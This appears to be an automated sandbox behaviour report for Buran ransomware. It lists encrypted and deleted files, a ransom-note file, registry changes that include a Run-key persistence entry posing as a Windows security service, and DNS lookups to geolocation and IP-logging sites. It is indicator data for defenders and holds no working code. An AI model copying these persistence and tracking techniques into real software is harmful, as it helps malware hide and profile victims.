- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
- "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
- "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
- "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe",
- "C:\\.doc",
- "C:\\.htm",
- "C:\\.jpeg",
- "C:\\.jpg",
- "C:\\.pptx",
- "C:\\.txt",
- "C:\\.xls",
- "C:\\Host.bmp",
- "C:\\Host.docx",
- "C:\\Host.html",
- "C:\\Host.jpeg",
- "C:\\Host.jpg",
- "C:\\Host.pdf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
- "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "geoiptool.com",
- "answers":
- "type": "A",
- "request": "iplogger.ru",
- "answers":
- * Domains:
- "ip": "158.69.67.193",
- "domain": "geoiptool.com"
- "ip": "88.99.66.31",
- "domain": "iplogger.ru"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement